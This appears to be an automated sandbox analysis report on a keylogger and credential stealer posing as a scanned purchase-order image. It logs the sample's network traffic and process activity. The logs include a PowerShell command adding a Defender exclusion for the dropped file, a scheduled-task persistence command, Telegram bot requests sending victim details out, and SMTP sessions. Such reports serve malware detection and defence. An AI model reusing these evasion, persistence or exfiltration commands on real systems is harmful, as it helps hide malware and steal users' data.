                                                                                                      13192.168.2.449764188.114.97.34437448C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-25 07:18:17 UTC87OUTGET /xml/173.254.250.81 HTTP/1.1
                                                                                                      Host: reallyfreegeoip.org
                                                                                                      Connection: Keep-Alive
                                                                                                      2024-10-25 07:18:17 UTC906INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 25 Oct 2024 07:18:17 GMT
                                                                                                      Content-Type: application/xml
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      access-control-allow-origin: *
                                                                                                      vary: Accept-Encoding
                                                                                                      Cache-Control: max-age=86400
                                                                                                      CF-Cache-Status: HIT
                                                                                                      Age: 373
                                                                                                      Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sqM%2BAHA8RsIHZDRkpoYSiZejlvCW0ydhooyknZvYJN%2BagNv4Ie2Kg%2BL6cn%2BIIpLn%2BDIH8mXouAn70JuMXy6pUDBFqwxL1ge6ab1YYN%2BFwc5e%2B8n2evai%2F3yvOGn1GJ%2Fe%2BihfVBdS"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8d806e86ba76ddad-DFW
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1212&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2311252&cwnd=175&unsent_bytes=0&cid=a9a73524fa8bb71e&ts=147&x=0"
                                                                                                      2024-10-25 07:18:17 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                                      Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                                      2024-10-25 07:18:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      14192.168.2.449767188.114.97.34431260C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-25 07:18:18 UTC63OUTGET /xml/173.254.250.81 HTTP/1.1
                                                                                                      Host: reallyfreegeoip.org
                                                                                                      2024-10-25 07:18:18 UTC894INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 25 Oct 2024 07:18:18 GMT
                                                                                                      Content-Type: application/xml
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      access-control-allow-origin: *
                                                                                                      vary: Accept-Encoding
                                                                                                      Cache-Control: max-age=86400
                                                                                                      CF-Cache-Status: HIT
                                                                                                      Age: 374
                                                                                                      Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XvenkQNQc2PGLvbfzNrrOytasmdZwJqRu1p0U45%2FeC3C2QQXoc4p7EThc%2FFfQBt6RUbDyysaM5a9SDfx7zOT%2FwKLZIV6Oj6iMAn7XMzIcsOJpnj8A2irWWyAE%2FEGNqVxKhHQllIY"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8d806e8b6f670072-DFW
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1351&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2048090&cwnd=251&unsent_bytes=0&cid=fb086a492514ed51&ts=153&x=0"
                                                                                                      2024-10-25 07:18:18 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                                      Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                                      2024-10-25 07:18:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      15192.168.2.449771188.114.97.34437448C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-25 07:18:19 UTC63OUTGET /xml/173.254.250.81 HTTP/1.1
                                                                                                      Host: reallyfreegeoip.org
                                                                                                      2024-10-25 07:18:19 UTC896INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 25 Oct 2024 07:18:19 GMT
                                                                                                      Content-Type: application/xml
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      access-control-allow-origin: *
                                                                                                      vary: Accept-Encoding
                                                                                                      Cache-Control: max-age=86400
                                                                                                      CF-Cache-Status: HIT
                                                                                                      Age: 375
                                                                                                      Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AIowmj4otZoZnb%2FbMRGdzWoo%2FRUNwMvzVik9qRgHS7a9dilLHDPSmhWPAJujOgr61Ol0D46dMh6aUEcuEHdEfKEyPZp4cCK5L4hyl8ZE3n6%2BS92VnHWmR1a%2FVyWg5LoqVAPTGH%2FE"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8d806e916e01e9ca-DFW
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1135&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2490111&cwnd=249&unsent_bytes=0&cid=4db768bb56d32cf6&ts=153&x=0"
                                                                                                      2024-10-25 07:18:19 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                                      Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                                      2024-10-25 07:18:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      16192.168.2.449770149.154.167.2204431260C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-25 07:18:19 UTC345OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:927537%0D%0ADate%20and%20Time:%2025/10/2024%20/%2019:19:15%0D%0ACountry%20Name:%20United%20States%0D%0A[%20927537%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1
                                                                                                      Host: api.telegram.org
                                                                                                      Connection: Keep-Alive
                                                                                                      2024-10-25 07:18:19 UTC344INHTTP/1.1 404 Not Found
                                                                                                      Server: nginx/1.18.0
                                                                                                      Date: Fri, 25 Oct 2024 07:18:19 GMT
                                                                                                      Content-Type: application/json
                                                                                                      Content-Length: 55
                                                                                                      Connection: close
                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                      Access-Control-Allow-Origin: *
                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                      2024-10-25 07:18:19 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                      Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      17192.168.2.449775188.114.97.34437448C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-25 07:18:21 UTC63OUTGET /xml/173.254.250.81 HTTP/1.1
                                                                                                      Host: reallyfreegeoip.org
                                                                                                      2024-10-25 07:18:21 UTC896INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 25 Oct 2024 07:18:21 GMT
                                                                                                      Content-Type: application/xml
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      access-control-allow-origin: *
                                                                                                      vary: Accept-Encoding
                                                                                                      Cache-Control: max-age=86400
                                                                                                      CF-Cache-Status: HIT
                                                                                                      Age: 377
                                                                                                      Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9Id2EZ7hhfX78YC0Qz2SvQYhOUHhOev4%2F%2B7i9ud18wrpVBbAGI9nnarcdpvYBuOCawJqMSSn0l01hu%2BVyYpfZG8dn3IqH%2BeTWDfcCgPb8RmW1yemPaYElKg1d0U%2BZG10KUtd9MtL"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8d806ea11e192cba-DFW
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1460&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2421404&cwnd=242&unsent_bytes=0&cid=5bb8b97d0aebc815&ts=160&x=0"
                                                                                                      2024-10-25 07:18:21 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                                      Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                                      2024-10-25 07:18:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      18192.168.2.449777188.114.97.34437448C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-25 07:18:22 UTC87OUTGET /xml/173.254.250.81 HTTP/1.1
                                                                                                      Host: reallyfreegeoip.org
                                                                                                      Connection: Keep-Alive
                                                                                                      2024-10-25 07:18:23 UTC890INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 25 Oct 2024 07:18:23 GMT
                                                                                                      Content-Type: application/xml
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      access-control-allow-origin: *
                                                                                                      vary: Accept-Encoding
                                                                                                      Cache-Control: max-age=86400
                                                                                                      CF-Cache-Status: HIT
                                                                                                      Age: 379
                                                                                                      Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u%2FR5qEatYF1SAQAiqtCc88vml7LyH07RTdc2LMQdTAPKSbNfTBOMHDbfMI8e6%2B2SDZ80dYqffsyeDOrT7PyE77U2PEzEzkOlhF7cuFTq06aBE30xcUivpCAfPbRxzoc1ZDHgEgnc"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8d806eaa0a1e2d41-DFW
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1372&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2049539&cwnd=251&unsent_bytes=0&cid=4b1b430b4f023819&ts=152&x=0"
                                                                                                      2024-10-25 07:18:23 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                                      Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                                      2024-10-25 07:18:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      19192.168.2.449778149.154.167.2204437448C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-25 07:18:24 UTC345OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:927537%0D%0ADate%20and%20Time:%2025/10/2024%20/%2020:37:54%0D%0ACountry%20Name:%20United%20States%0D%0A[%20927537%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1
                                                                                                      Host: api.telegram.org
                                                                                                      Connection: Keep-Alive
                                                                                                      2024-10-25 07:18:24 UTC344INHTTP/1.1 404 Not Found
                                                                                                      Server: nginx/1.18.0
                                                                                                      Date: Fri, 25 Oct 2024 07:18:24 GMT
                                                                                                      Content-Type: application/json
                                                                                                      Content-Length: 55
                                                                                                      Connection: close
                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                      Access-Control-Allow-Origin: *
                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                      2024-10-25 07:18:24 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                      Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                      SMTP Packets

                                                                                                      TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                      Oct 25, 2024 09:18:26.238082886 CEST58749779104.243.33.38192.168.2.4220-gracious.crystalwebhosting.com ESMTP Exim 4.98 #2 Fri, 25 Oct 2024 03:18:26 -0400
                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                      220 and/or bulk e-mail.
                                                                                                      Oct 25, 2024 09:18:26.239008904 CEST49779587192.168.2.4104.243.33.38EHLO 927537
                                                                                                      Oct 25, 2024 09:18:26.403197050 CEST58749779104.243.33.38192.168.2.4250-gracious.crystalwebhosting.com Hello 927537 [173.254.250.81]
                                                                                                      250-SIZE 52428800
                                                                                                      250-LIMITS MAILMAX=1000 RCPTMAX=50000
                                                                                                      250-8BITMIME
                                                                                                      250-PIPELINING
                                                                                                      250-PIPECONNECT
                                                                                                      250-STARTTLS
                                                                                                      250 HELP
                                                                                                      Oct 25, 2024 09:18:26.403522015 CEST49779587192.168.2.4104.243.33.38STARTTLS
                                                                                                      Oct 25, 2024 09:18:26.571563959 CEST58749779104.243.33.38192.168.2.4220 TLS go ahead
                                                                                                      Oct 25, 2024 09:18:30.363224030 CEST58749780104.243.33.38192.168.2.4220-gracious.crystalwebhosting.com ESMTP Exim 4.98 #2 Fri, 25 Oct 2024 03:18:30 -0400
                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                      220 and/or bulk e-mail.
                                                                                                      Oct 25, 2024 09:18:30.363590956 CEST49780587192.168.2.4104.243.33.38EHLO 927537
                                                                                                      Oct 25, 2024 09:18:30.525639057 CEST58749780104.243.33.38192.168.2.4250-gracious.crystalwebhosting.com Hello 927537 [173.254.250.81]
                                                                                                      250-SIZE 52428800
                                                                                                      250-LIMITS MAILMAX=1000 RCPTMAX=50000
                                                                                                      250-8BITMIME
                                                                                                      250-PIPELINING
                                                                                                      250-PIPECONNECT
                                                                                                      250-STARTTLS
                                                                                                      250 HELP
                                                                                                      Oct 25, 2024 09:18:30.526115894 CEST49780587192.168.2.4104.243.33.38STARTTLS
                                                                                                      Oct 25, 2024 09:18:30.688656092 CEST58749780104.243.33.38192.168.2.4220 TLS go ahead

                                                                                                      Statistics

                                                                                                      CPU Usage

                                                                                                      Click to jump to process

                                                                                                      Memory Usage

                                                                                                      Click to jump to process

                                                                                                      High Level Behavior Distribution

                                                                                                      Click to dive into process behavior distribution

                                                                                                      Behavior

                                                                                                      Click to jump to process

                                                                                                      System Behavior

                                                                                                      General

                                                                                                      Target ID:0
                                                                                                      Start time:03:17:58
                                                                                                      Start date:25/10/2024
                                                                                                      Path:C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe"
                                                                                                      Imagebase:0xd30000
                                                                                                      File size:835'592 bytes
                                                                                                      MD5 hash:52F14C343D0B2EC1426E775C6B6569FF
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1733478686.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1733478686.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1733478686.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1733478686.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:2
                                                                                                      Start time:03:18:01
                                                                                                      Start date:25/10/2024
                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe"
                                                                                                      Imagebase:0xf00000
                                                                                                      File size:433'152 bytes
                                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:3
                                                                                                      Start time:03:18:01
                                                                                                      Start date:25/10/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:4
                                                                                                      Start time:03:18:01
                                                                                                      Start date:25/10/2024
                                                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HJnkiZjAPsec" /XML "C:\Users\user\AppData\Local\Temp\tmpB8C6.tmp"
                                                                                                      Imagebase:0xb50000
                                                                                                      File size:187'904 bytes
                                                                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:5
                                                                                                      Start time:03:18:01
                                                                                                      Start date:25/10/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:6
                                                                                                      Start time:03:18:01
                                                                                                      Start date:25/10/2024
                                                                                                      Path:C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe"
                                                                                                      Imagebase:0x8b0000
                                                                                                      File size:835'592 bytes
                                                                                                      MD5 hash:52F14C343D0B2EC1426E775C6B6569FF
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.4132369730.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.4132369730.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000002.4132369730.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:low
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:7
                                                                                                      Start time:03:18:02
                                                                                                      Start date:25/10/2024
                                                                                                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                      Imagebase:0x7ff693ab0000
                                                                                                      File size:496'640 bytes
                                                                                                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:8
                                                                                                      Start time:03:18:03
                                                                                                      Start date:25/10/2024
                                                                                                      Path:C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe
                                                                                                      Imagebase:0x890000
                                                                                                      File size:835'592 bytes
                                                                                                      MD5 hash:52F14C343D0B2EC1426E775C6B6569FF
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
